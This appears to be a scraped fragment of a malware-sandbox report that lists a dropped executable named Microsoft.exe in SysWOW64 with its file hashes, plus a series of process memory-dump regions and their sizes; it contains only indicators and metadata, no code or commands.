0c6b8bd5e038292e064f47f35882adf43a8317ee05d052cf251c62d6dfce14f15fb240530946120b370b6fce53a7e8e3d716d32d53c9eee016b2ac2efca2eb97

Download Submit
C:\Windows\SysWOW64\Microsoft.exe
Filesize
780KB

MD5
aceeb574066c69e3ef181dacc559e418

SHA1
1c8f6c838951c4b344e69db7cba27ab04cc48235

SHA256
fc9c423da251f7fb08f426f5d153fae73532cc1a3c349a040526b6bedd632c9e

SHA512
0c6b8bd5e038292e064f47f35882adf43a8317ee05d052cf251c62d6dfce14f15fb240530946120b370b6fce53a7e8e3d716d32d53c9eee016b2ac2efca2eb97

Download Submit
C:\Windows\SysWOW64\Microsoft.exe
Filesize
780KB

MD5
aceeb574066c69e3ef181dacc559e418

SHA1
1c8f6c838951c4b344e69db7cba27ab04cc48235

SHA256
fc9c423da251f7fb08f426f5d153fae73532cc1a3c349a040526b6bedd632c9e

SHA512
0c6b8bd5e038292e064f47f35882adf43a8317ee05d052cf251c62d6dfce14f15fb240530946120b370b6fce53a7e8e3d716d32d53c9eee016b2ac2efca2eb97

Download Submit
memory/1792-243-0x00000000007B0000-0x00000000007B1000-memory.dmp

Filesize
4KB

Download
memory/2116-244-0x0000000002290000-0x0000000002291000-memory.dmp

Filesize
4KB

Download
memory/2116-246-0x0000000000400000-0x00000000004D0000-memory.dmp

Filesize
832KB

Download
memory/3256-147-0x000002E874730000-0x000002E874740000-memory.dmp

Filesize
64KB

Download
memory/3256-146-0x000002E874730000-0x000002E874740000-memory.dmp

Filesize
64KB

Download
memory/3256-145-0x000002E874730000-0x000002E874740000-memory.dmp

Filesize
64KB

Download
memory/3256-144-0x000002E85B010000-0x000002E85B032000-memory.dmp

Filesize
136KB

Download
memory/3736-184-0x0000000002290000-0x0000000002291000-memory.dmp

Filesize
4KB

Download
memory/3736-245-0x0000000000400000-0x00000000004D0000-memory.dmp

Filesize
832KB

Download
memory/4248-177-0x000002964E6B0000-0x000002964E6C0000-memory.dmp

Filesize
64KB

Download
memory/4248-174-0x000002964E6B0000-0x000002964E6C0000-memory.dmp

Filesize
64KB

Download